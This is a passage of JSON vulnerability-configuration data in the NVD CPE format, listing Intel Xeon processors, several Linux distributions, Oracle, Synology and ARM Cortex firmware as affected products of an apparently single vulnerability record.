                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2803:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2820:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2850_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2860:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2870:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2870_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2880_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2890_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4807:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4860:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4860_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4870:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4870_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4880_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4890_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8837:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8850_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8857_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880l_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880l_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8891_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8894_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5115:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5118:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5119t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5120:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5120t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5122:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6128:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6132:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6134:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6134m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6136:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6140:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6140m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6144:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6146:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6148:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6148f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6150:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6152:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6154:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7210:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7210f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7230:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7230f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7235:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7250:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7250f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7285:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7290:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7290f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7295:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8153:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8156:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8158:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8164:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8168:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8170:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8170m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8180:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4108:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4109t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4110:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4112:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4114:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4114t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4116:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4116t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:17.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:local_service_management_system:13.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:local_service_management_system:13.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:local_service_management_system:13.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:synology:diskstation_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "6.2.2-24922",
                "versionStartIncluding": "5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:synology:router_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.1.7-6941-1",
                "versionStartIncluding": "1.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:synology:skynas:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:synology:virtual_machine_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "6.2-23739",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:synology:vs960hd_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:synology:vs960hd:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:synology:vs360hd_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:synology:vs360hd:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:12:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:12:sp2:*:*:*:*:raspberry_pi:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:12:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_software_development_kit:11:sp4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_software_development_kit:12:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_software_development_kit:12:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-r7_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-r7:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-r8_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-r8:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a8_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a8:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a12_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a12:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a15_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a15:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a17_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a17:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
